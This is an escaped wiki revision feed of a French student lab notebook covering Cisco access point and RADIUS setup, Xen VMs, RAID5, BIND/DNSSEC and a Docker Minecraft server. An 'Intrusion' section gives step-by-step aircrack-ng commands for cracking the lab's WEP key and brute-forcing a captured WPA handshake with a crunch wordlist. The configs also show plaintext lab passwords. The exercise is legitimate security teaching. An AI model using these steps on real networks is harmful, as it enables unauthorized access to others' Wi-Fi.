 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60282</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60282"/>
				<updated>2022-11-29T00:05:18Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Sécurisation des données - RAID5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Vérification&lt;br /&gt;
[[Fichier:RAID5_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
===DNS===&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.48&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  193.48.57.0/24;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===DNSSEC===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes;&lt;br /&gt;
dnssec-validation yes;&lt;br /&gt;
dnssec-lookaside auto;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Création du répertoire &amp;lt;code&amp;gt;detestable.site.dnssec&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;mkdir /etc/bind/detestable.site.dnssec/&lt;br /&gt;
cd /etc/bind/detestable.site.dnssec/&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature de clefs de zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-ksk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-ksk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature des enregistrements :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-zsk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-zsk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-ksk.key&amp;amp;quot;&lt;br /&gt;
$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-zsk.key&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Signature des enregistrements de la zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o detestable.site -k detestable.site-ksk ../db.detestable.site detestable.site-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;demineur.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site.signed&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier &amp;lt;code&amp;gt;detestable.site-ksk.key&amp;lt;/code&amp;gt;) à Gandi.&amp;lt;br /&amp;gt;&lt;br /&gt;
L’algorithme utilisé est le 8 (RSA/SHA-256).&lt;br /&gt;
&lt;br /&gt;
=== Tester DNSSEC : ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cd /etc/bind/&lt;br /&gt;
dnssec-verify -o detestable.site db.detestable.site.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vérifier son DNS avec dnsviz ===&lt;br /&gt;
[[Fichier:dnsviz_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
